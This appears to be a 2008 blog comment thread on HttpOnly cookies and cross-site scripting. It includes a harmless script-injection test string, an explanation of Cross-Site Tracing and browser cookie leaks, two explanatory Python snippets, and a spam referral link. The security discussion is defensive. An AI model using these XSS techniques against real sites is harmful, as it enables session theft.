> soon as I start reading, it drops to once a week? So far I'm
> contenting myself with trawling through back issues, but, you know.
> When will normal service be resumed?
I guess you haven't worked your way up to the August 24 post:
> You may have noticed that my posting frequency has declined over
> the last three weeks. That's because I've been busy building that
> Stack Overflow thing we talked about.
*More Crickets Chirp*
Simucal on September 5, 2008 02:47 PM
I see a lot of comments wondering where Jeff has gotten to. Well, I think it's a tad unfair and unrealistic to expect him to be able to post numerous times per week for the rest of eternity. I'll happily keep checking back each day until a new post appears :)
I'm sure normal service will resume, he's probably busy at work, or if not, having some much deserved time to himself.
Alasdair on September 6, 2008 06:05 AM
Well it seems pretty likely that he's trying to put off his next post until it can be the debut of Stack Overflow.
Which, you know, I'm actually in favor of. Looks like a useful site, from the screenshots I've seen.
But it's been now well over a week since the last post. Obviously things are taking a little more time than he thought. Which again, I understand -- how many times have we all been in that position where we're JUST about ready to send something off and, oh, there's a little bug here, and oh, just gotta remember to fix that up here, and oh, CRAP the whole thing is falling apart now, and oh, damn damn damn, and oh....
But come on Jeff! We're your lifeblood here. We are your base! Throw us a bone. Most of us aren't in on the Beta so we're just sitting here with a dead blog, and the "coming soon" page on stackoverflow.com is pretty uninspiring. We got nothing! If it isn't a sure thing that you'll have something spectacular soon (as in, by Monday), at least just give us a little heads-up, something to gnaw on...
(Unless, of course, Jeff has been hit by a car or some other unforeseeable tragedy. In which case I eat my hat.)
Shmork on September 6, 2008 08:24 AM
"(as in, by Monday)"
rofl
don't go getting too big for your boots!
Shdick on September 6, 2008 02:03 PM
p.s. jeff did you ever make a webapp before? your last few posts have been a bit.. entry-level.
Are you dead?
Dave on September 7, 2008 02:15 AM
I'm just makin' suggestions, not demands. It'll be almost two weeks without a peep if it goes much longer...
Shmork on September 7, 2008 05:24 AM
Seems to me like the perfect time for a post about maintaining relationships with your clients. Stack Overflow may become a success or might fail, but you've become a name by providing regular posts on codinghorror.com. Now that you are moving on to bigger and better things, you should not neglect the people who have afforded you the opportunity to make this your career choice.
Your posts of late have been infrequent and in all honesty not up to your usual standard. We, your readers, are still here. But we won't be forever.
Jeff, say something....
Niyaz PK on September 7, 2008 10:56 PM
If you're able to forget to HTML-encode some user input, you're probably also just concatenating strings of text. If you build your pages using proper XML tools, there is no conceivable way that you can accidentally include unsanitized user input in the page.
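To illustrate the point about XML tools, here is a small sketch using Python's standard `xml.etree.ElementTree`. The `render_comment` function and the element layout are assumptions made up for this example. User input is assigned as text content, and the serializer escapes it, so there is no encoding step to forget.

```python
import xml.etree.ElementTree as ET


def render_comment(author: str, body: str) -> str:
    """Build a comment fragment as a tree instead of concatenating strings."""
    div = ET.Element("div", {"class": "comment"})
    paragraph = ET.SubElement(div, "p")
    paragraph.text = body          # stored as text, never parsed as markup
    cite = ET.SubElement(div, "cite")
    cite.text = author
    # Serialization escapes &, < and > in text nodes.
    return ET.tostring(div, encoding="unicode")


print(render_comment("mallory", "<script>alert('hello XSS!');</script>"))
```

The script tag in the body comes out as entity codes because the tree only ever held it as character data. This covers text and attribute values; it does not by itself make a user-supplied URL or style value safe.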
clockwork on September 9, 2008 04:07 PM
Well, judging from the new post the mystery of Jeff's absence is seriously solved.
DennisSC on September 13, 2008 03:49 PM
Besides the fact (which you mention) that you can still perform other, non-cookie-related XSS attacks, there is another way to bypass httpOnly protections, regardless of the browser: using XSS to perform a Cross-Site Tracing (XST) attack.
If the server supports the TRACE method, the malicious script can send a TRACE request and parse the response (which will contain the cookie).
Worse yet, even if the server does not support TRACE, but one of the proxies on the way does (can be reverse proxy, or even the user's organizational proxy), XST can still be accomplished by sending the TRACE request to the proxy...
BUT regardless of XST, I still highly recommend using httpOnly. At least it will block non-XST attacks...
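Why TRACE defeats httpOnly can be seen from a simplified model of what a TRACE-enabled server sends back: the request it received, headers included. The `trace_response_body` function below is a hypothetical stand-in for that echo behaviour, not a real HTTP server.

```python
from typing import Mapping


def trace_response_body(path: str, headers: Mapping[str, str]) -> str:
    """Model of a TRACE response body: the received request, echoed verbatim."""
    lines = [f"TRACE {path} HTTP/1.1"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"


# The browser attaches the httpOnly cookie to the outgoing request itself,
# so it shows up in the echoed body that the script is able to read.
body = trace_response_body("/", {"Host": "example.com", "Cookie": "session=abc123"})
print(body)
```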
This blog post is wrong on one key issue: IE7 is still very vulnerable to the XMLHttpRequest exposure of HTTPOnly cookies via response headers.
The fact is, the only browser that locks down this vector is the IE8 beta, but Firefox 3.1 will surely lock down this vector. https://bugzilla.mozilla.org/show_bug.cgi?id=380418
The latest version of IE7 (as of this writing), 7.0.6001.18000, still exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders()
Jim Manico on September 24, 2008 04:37 PM
The latest version of IE8 beta 2 (as of this writing), 8.0.6001.18241, also exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders(). Firefox 3.1 is on track to close this hole, see: https://bugzilla.mozilla.org/show_bug.cgi?id=380418
Jim Manico on September 26, 2008 07:27 PM
thank you.
Hikaye on September 27, 2008 04:24 AM
A coincidence?
http://news.cnet.com/8301-1009_3-10056854-83.html?part=rss&subj=news&tag=2547-1_3-0-5
t on October 2, 2008 02:58 PM
nice tips but i'm still confused how to use this
qoyyim on October 11, 2008 03:03 PM
I'm new to PHP and recently set up my local machine with PHP and MySQL for doing development. I was sort of stuck when I needed to post my work for the user to test and review. After looking around a bit I found a site that hosts PHP and MySQL apps. I was surprised that it was free; it seems they're offering the service at no cost until 2012. At that point they'll change over to a fee-based service. However, in the meantime, it's a great place to do anything from demo and sandbox right up to posting sites for real.
Their pitch is as follows:
"This is absolutely free, there is no catch. You get 350 MB of disk space and 100 GB bandwidth. They also have cPanel control panel which is amazing and easy to use website builder. Moreover, there is not any kind of advertising on your pages."
Check it out using this link:
http://www.000webhost.com/83188.html
Important: There's one catch in that you must make sure you visit the account every 14 days - otherwise the account is marked 'Inactive' and the files are deleted!!!
Thanks and good luck!
| Content (c) 2008 Jeff Atwood. Logo image used with permission of the author. (c) 1993 Steven C. McConnell. All Rights Reserved. |